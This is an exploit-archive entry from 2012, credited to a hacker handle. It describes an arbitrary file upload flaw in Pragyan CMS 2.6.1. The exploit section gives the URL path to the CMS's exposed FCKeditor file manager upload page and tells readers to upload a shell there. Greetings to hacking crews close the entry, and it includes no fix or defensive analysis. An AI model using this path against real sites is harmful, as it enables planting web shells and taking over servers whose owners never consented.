Pragyan CMS 2.6.1 Arbitrary File Upload Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Pragyan CMS 2.6.1 Arbitrary File Upload Vulnerability
# Published : 2012-01-13
# Author :
# Previous Title : Pragyan CMS v 3.0 Remote File Disclosure
# Next Title : MangosWeb SQL Injection Vulnerability

==========================================
# Exploit Title: pragyan 2.6.1 Upload File
# Author: Dr.KroOoZ
# Software : http://ignum.dl.sourceforge.net/project/pragyan/pragyan/2.6.1/pragyan-2.6.1.tar.gz
# Tested on: || Linux || Windows ||
# Dork : 
==========================================
 ===[ Exploit ]===

http://localhost/Path/cms/modules/article/fckEditor/editor/filemanager/browser/default/frmupload.html

Then Upload Shell xD

========================================== 
Homepage : www.ttgsa.com 
==========================================
[?] Greetz to:
[ ZGaRT NeT & R.B.G HackEr & No-QRQR & Mr.Abu.Z7Z7 & New KilleR & FoX HaCkeR & Mr.DH & HaNiBaL KsA ]